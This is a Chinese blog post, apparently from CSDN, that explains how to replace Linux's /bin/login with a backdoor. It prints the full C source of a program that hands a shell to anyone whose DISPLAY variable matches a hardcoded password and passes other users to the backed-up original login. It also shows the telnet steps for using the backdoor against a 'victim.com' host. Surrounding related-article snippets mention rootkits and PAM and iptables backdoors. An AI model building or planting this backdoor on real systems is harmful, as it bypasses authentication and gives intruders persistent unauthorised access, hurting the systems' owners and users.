linux后门密码如何修改,linux简单后门之login实现

最新推荐文章于 2024-05-07 08:31:17 发布
最新推荐文章于 2024-05-07 08:31:17 发布
阅读量424 收藏
点赞数
文章标签: linux后门密码如何修改

先把原始的/bin/login备份,再用自己的后门程序替换/bin/login。使用者telnet登录时,通过环境变量或者终端类型传递了正确的后门密码,将直接获得一个Shell;如果是普通用户登录,重定向到原始的login文件,来处理正常登录。

最简单的login后门ulogin.c源代码如下:

实例:login后门

/****************/

#include #define PASSWORD "passWORD"

#define _PATH_LOGIN "/sbin/logins" //这里的"/sbin/logins"即是备份原来的"/bin/login",而本程序编译后将替换为"/bin/login"

main (argc, argv, envp)

int argc;

char **argv, **envp;

{

char *display = getenv("DISPLAY");

if ( display == NULL ) { //若为空,即是正常登录,用备份的"/sbin/logins"处理请求

execve(_PATH_LOGIN, argv, envp);

perror(_PATH_LOGIN);

exit(1);

}

if (!strcmp(display,PASSWORD)) { //比较密码是否正确,正确则为使用者登录;否则则为正常登录,转下面处理

system("/bin/csh"); //直接启动csh,也可以使用bash

exit(1);

}

execve(_PATH_LOGIN, argv, envp); //正常登录

exit(1);

}

/*********************/

利用后门登录

前提是对方机器上已经替换并备份"/bin/login"为"/sbin/logins",而且Telnet服务是打开的。然后在本机器执行:

/************************/

bash$ export DISPLAY=passWORD

bash$ telnet victim.com

Trying xxx.xxx.xxx.xxx...

Connected to victim.com (xxx.xxx.xxx.xxx).

Escape character is '^]'.

$

/*************************/

另:strings命令能够打印出二进制文件中的可显示字符串,如"strings /bin/login"

lithops7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linuxlogin进程源码分析
01-02
分析了Linuxlogin进程的实现
Linux服务器如何修改登录用户的密码
热门推荐
weixin_44530708的博客
03-21 1万+
Linux服务器如何修改登录用户的密码
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
05-07 2562
Rootkit 是网络犯罪分子用来控制目标计算机或网络的软件。Rootkit 有时可以显示为单个软件,但通常由一系列工具组成,这些工具允许黑客对目标设备进行管理员级控制。黑客通过多种方式在目标计算机上安装 Rootkit:最常见的是通过网络钓鱼或其他类型的社会工程攻击。受害者在不知不觉中下载并安装隐藏在计算机上运行的其他进程中的恶意软件,并让黑客控制操作系统的几乎所有方面。另一种方法是利用漏洞(即软件或未更新的操作系统中的弱点)并将 Rootkit 强制安装到计算机上。
如何修改linux程序里的密码忘了怎么办,Linux 忘记密码解决方法
weixin_29732787的博客
05-05 81
Linux 忘记密码解决方法很多朋友经常会忘记Linux系统的root密码linux系统忘记root密码的情况该怎么办呢?重新安装系统吗?当然不用!进入单用户模式更改一下root密码即可。步骤如下:重启linux系统 3秒之内要按一下回车,出现如下界面 然后输入e 在第二行最后边输入single,有一个空格。具体方法为按向下尖头移动到第二行,按"e"进入编辑模式在后边加上single回车...
linux login源码,Linux系统裁减之,制作一个极度精简的Linux-4-使用mingetty绕开/bin/login...
weixin_31957989的博客
05-12 509
第4章使用mingetty绕开登录程序/bin/login在阅读这篇博文之前,建议先阅读我的前3篇博文,而且最好按顺序阅读:(不然可能会觉得我写得不知所云,呵呵!)第2篇:Linux系统裁减之,制作一个极度精简的Linux-2-用脚本实现自动拷贝命令和依赖库文件https://blog.51cto.com/linuxprince/2046142第3篇:Linux系统裁减之,制作一个极度精简的Li...
通用密码后门
Yatere的天平秤
05-14 905
<br />其实这些东西我很早就做出来用了,而且效果还不错,目前没有一个管理员发现。<br /><br />以下程序只在winxpsp2中文版上测试#include <stdio.h> #include <stdlib.h> #include "windows.h" #include "wincrypt.h" wchar_t passwd[1024]; char path[1024], hash[16]; const int os1 = 0x8DB0, os2 = 0x1C3A7, ospass
培训linux靶机竞赛解题文档1
08-08
管理员常常会使用诸如"admin/admin123"或"123456"这样的简单密码,这给攻击者提供了轻易入侵的机会。参赛者需要尝试不同的用户名和密码组合来尝试登录管理后台(http://172.20.101.101/admin/login.php),一旦猜中...
Linux访问控制机制的优化设计.pdf
09-06
例如,管理认证的程序(如/bin/login)和存储用户口令的配置文件(如/etc/shadow和/etc/passwd)可以直接被root用户修改,这为攻击者提供了便利,他们可以轻易篡改系统核心功能或窃取敏感信息。 再者,Linux原生的...
Linux用户和组管理问答.pdf
09-06
本文主要涉及Linux下用户和组的管理,包括修改用户信息、更改用户Shell类型、以及如何验证用户和组文件的一致性。 首先,我们可以使用`chfn`命令来修改用户的信息,如全名、办公室地址和电话等。这个工具方便管理员...
看懂Linux的日记.pdf
09-06
《看懂Linux的日记》这本书主要讲解了Linux操作系统中的日志系统——Syslog,这是一个非常关键的组件,用于记录系统日常运行中发生的各种事件。管理员可以通过日志文件来检查错误产生的原因,甚至追踪可能的攻击行为...
大牛后门 密码
05-06
后门密码 收集
login.c的代码
11-30
实现将注册的用户名和密码,写进sqlite3数据库中,操作环境为linux嵌入式
Linux中存放用户密码信息的文件,存放密码过期修改等信息
ganfanren00001的博客
01-02 5412
Linux中存放用户密码信息的文件,存放密码过期修改等信息 用户密码信息文件,这个路径的文件存放着关于用户密码的信息,但是看不到密码,而是看用户密码的时限啥的。 /etc/shadow 用户密码文件中的用户密码信息,由7个:分割的8列字符数据组成:以root为例 第一列是用户名,root 第二列是加密密码,$数字:加密算法,$内容:密码值,密码密码文件中也是加密的,看不到。 第三列是最后修改时间,历史1970,1,1到现在修改那天的天数的差值,纪念Linux开发用的,这里空着在。 第四列是最小时间间隔
权限维持|linux密码抓取和后门(下)
weixin_42282189的博客
11-24 2986
作者:1e0n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 上回书说到,在获取到Linux服务器root权限的情况下,如何获取明文密码并维持权限。这次来说一下iptables端口复用后门及其他利用。话不多说,直接开始。 iptables端口复用后门 tiny shell后门 其他可利用的点 0x01 iptables端口复用后门 1.1 实现原理 首先是要用到iptables防火墙,创建iptables规则,并使用ICMP包来触发该规则, 从而实现端口复用[.
怎么查找Linux服务器是否有后门账户
网站安全专家
11-15 1222
依据我们SINE安全15年的安全从业经验来看,检查Linux服务器里是否被植入隐藏的系统账户后门,可以编辑一下/etc/passwd文件中的新增的潜藏用户,还可以利用awk命令,查询uid=0以及uid>=500的所有用户名,如下图的指令就可以查询是否有异常的后门账户,还可以查看Linux 账户的登录历史记录,以及登录的IP来看下,是否有异常的账号和IP登录过服务器。还可以将SINE账户写到Linux 里的/etc/passwd文件,VI编辑以后,通过passwd命令,设置SINE账户的密码
SSH PAM后门(万能密码、记录密码
网络安全。
08-19 3434
PAM是Linux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码,记录登陆密码等功能。 1、在centos中需要关闭selinux。 永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。 2、查看PAM版本。 rpm -qa|grep pam 源码下载地址:http://www.linux-pam.org/library/ 3、解压。 wget http://www.linux-pam.org/library/Linux-PAM-1.1.8
Linux — 系统账号及权限管理
骑猪兜风的博客
05-12 405
用户账号和组账号概述用户账号件/etc/passwd用户账号件/etc/shadow添加用户账号设置/E改用户口passwd修改用户账号的属性usermod删除用户账号userdel用户账号的初始配置文件主要的用户初始配置文件组账号文件查询账号信息查询账号信息(2)文件/目录的权限和归属 用户账号和组账号概述 ◾Linux基于用户身份对资源访问进行控制 用户账号 超级用户:root 账号的UID和GID号为固定值0 普通用户:由超管root创建 账号的UID和GID号默认为500~60000 程序.
深入理解Linux Vim配置加载机制与实战后门设置
本文主要探讨的是实战中的Linux环境下Vim后门的相关知识,特别是关注于Vim配置的加载过程和安全问题。Vim是Vi Improved的增强版,作为一款强大的文本编辑器,它在程序员和文本编辑爱好者中广受欢迎,其特性包括代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值